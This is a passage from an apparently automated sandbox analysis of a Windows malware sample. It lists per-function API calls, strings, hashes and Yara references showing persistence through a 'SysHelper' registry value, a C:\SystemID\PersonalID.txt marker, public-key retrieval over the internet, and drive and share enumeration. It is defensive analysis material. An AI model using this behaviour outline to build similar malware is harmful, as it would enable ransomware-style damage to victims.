                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                                                                                                      • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                                                      • API String ID: 2864494435-54166481
                                                                                                                                                                                                      • Opcode ID: 668aece8c99ea5c9e6175df748f0ede5af6f34e9147d9484ea9038d6ec1cbe4f
                                                                                                                                                                                                      • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 668aece8c99ea5c9e6175df748f0ede5af6f34e9147d9484ea9038d6ec1cbe4f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040C6A0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0041E6D4), ref: 0040C6C2
                                                                                                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                                                                                                                                      • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                                                                                                                                      • RegCloseKey.KERNEL32(00000000), ref: 0040C72E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseValue$OpenQuery
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                                                                                                      • API String ID: 3962714758-1667468722
                                                                                                                                                                                                      • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                                                                                                                      • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041E6E8, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0041E707
                                                                                                                                                                                                        • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                                                                                                                                                                                                      • InternetOpenW.WININET ref: 0041E743
                                                                                                                                                                                                      • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                                                                                                                                      • _memmove.LIBCMT ref: 0041E838
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 0041E90A
                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                                                                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                                                                                                                                      • _strstr.LIBCMT ref: 0041EA36
                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                                                                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                                                                                                                                      • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 0041EB5B
                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0041EB86
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0041EB94
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 0041EBB6
                                                                                                                                                                                                      • _strstr.LIBCMT ref: 0041EBDA
                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                                                                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                                                                                                      • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                                                                                                      • API String ID: 2805819797-1771568745
                                                                                                                                                                                                      • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                                                                                                                      • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040C500, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                                                                                                                                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Path$AppendFolder
                                                                                                                                                                                                      • String ID: bowsakkdestx.txt
                                                                                                                                                                                                      • API String ID: 29327785-2616962270
                                                                                                                                                                                                      • Opcode ID: 474c6379b963d257ae86b00d206dade7857df39941341afbbe7ce7c2bd65e929
                                                                                                                                                                                                      • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 474c6379b963d257ae86b00d206dade7857df39941341afbbe7ce7c2bd65e929
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041BA80, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateWindowExW.USER32 ref: 0041BAAD
                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                                                                                                                                                                                      • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$CreateShowUpdate
                                                                                                                                                                                                      • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                                                                                                      • API String ID: 2944774295-3503800400
                                                                                                                                                                                                      • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                                                                                                                      • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00410BD0, Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00410C12
                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00410C39
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00410C4C
                                                                                                                                                                                                      • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 364255426-0
                                                                                                                                                                                                      • Opcode ID: 54b312cc4ee8bd09624119d4c268e334e055f93c635bfd49589b22278edf9028
                                                                                                                                                                                                      • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54b312cc4ee8bd09624119d4c268e334e055f93c635bfd49589b22278edf9028
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00410A50, Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                                                                                                                                      • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                                                                                                                      • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2560635915-0
                                                                                                                                                                                                      • Opcode ID: 6a00f287b25f822fcf47a96074d5a0ed9d8421437aa5125ae0fc33b4cf39192e
                                                                                                                                                                                                      • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a00f287b25f822fcf47a96074d5a0ed9d8421437aa5125ae0fc33b4cf39192e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00423B4C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00423B64
                                                                                                                                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00820000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00423B82
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00423B97
                                                                                                                                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                                                                                      • String ID: bad allocation
                                                                                                                                                                                                      • API String ID: 3074076210-2104205924
                                                                                                                                                                                                      • Opcode ID: 420923b3457038c229efad47892c1d2d87452850087ae7eb2c83c6acc61aea80
                                                                                                                                                                                                      • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 420923b3457038c229efad47892c1d2d87452850087ae7eb2c83c6acc61aea80
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040F0E0, Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 0040F125
                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(00000000), ref: 0040F1A8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$ChangeCloseCreateFindNotificationWritelstrlen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2283478230-0
                                                                                                                                                                                                      • Opcode ID: 5c8438f1e0f5686fb8668cf41c0fff02d28d9d0dbeeb44db3d71cae29d95a2fc
                                                                                                                                                                                                      • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c8438f1e0f5686fb8668cf41c0fff02d28d9d0dbeeb44db3d71cae29d95a2fc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041B185, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                                                                                                                                                                                                        • Part of subcall function 004111C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0041120F
                                                                                                                                                                                                        • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00411228
                                                                                                                                                                                                        • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041123D
                                                                                                                                                                                                        • Part of subcall function 004111C0: MoveFileW.KERNEL32(00000000,?), ref: 00411277
                                                                                                                                                                                                        • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                                                                                                                        • Part of subcall function 0041BA10: RegisterClassExW.USER32 ref: 0041BA73
                                                                                                                                                                                                        • Part of subcall function 0041BA80: CreateWindowExW.USER32 ref: 0041BAAD
                                                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0041B4CD
                                                                                                                                                                                                      • DispatchMessageW.USER32 ref: 0041B4D7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                                                                                                      • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                                                                                                      • API String ID: 441990211-897913220
                                                                                                                                                                                                      • Opcode ID: 45d73429e29eeefaca4f9398968167e5edb4bad7ffa24b22de0f09ece1bcdd92
                                                                                                                                                                                                      • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45d73429e29eeefaca4f9398968167e5edb4bad7ffa24b22de0f09ece1bcdd92
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00413C40, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                                                                                                                                                                                        • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00413C83
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                                                                                                                      • String ID: vector<T> too long
                                                                                                                                                                                                      • API String ID: 1327501947-3788999226
                                                                                                                                                                                                      • Opcode ID: 071899a1ec40e58124afefb64c3ca946a609d82b36fd57056892d0f11dd476bc
                                                                                                                                                                                                      • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 071899a1ec40e58124afefb64c3ca946a609d82b36fd57056892d0f11dd476bc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040C919, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _fputws$CreateDirectory
                                                                                                                                                                                                      • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                                                      • API String ID: 2590308727-54166481
                                                                                                                                                                                                      • Opcode ID: b7d04aaf57e2c38a629a4b8fb192307efab073ba7f3b957db105f9608cfaa5d8
                                                                                                                                                                                                      • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7d04aaf57e2c38a629a4b8fb192307efab073ba7f3b957db105f9608cfaa5d8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040EF50, Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0040EF69
                                                                                                                                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00820000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0040EF85
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040EF9B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _malloc$AllocateHeap_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3655941445-0
                                                                                                                                                                                                      • Opcode ID: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                                                                                                                                                                                                      • Instruction ID: 5fa84ec4042e21db229fa26042ce02b7cce951e2f5e2b33d0654eda62efe4b83
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06110631600624EFCB10DF99D881A5ABBB5FF89314F2445A9E9489F396D731B912CBC1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00411AB0, Relevance: 4.5, APIs: 3, Instructions: 42windowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
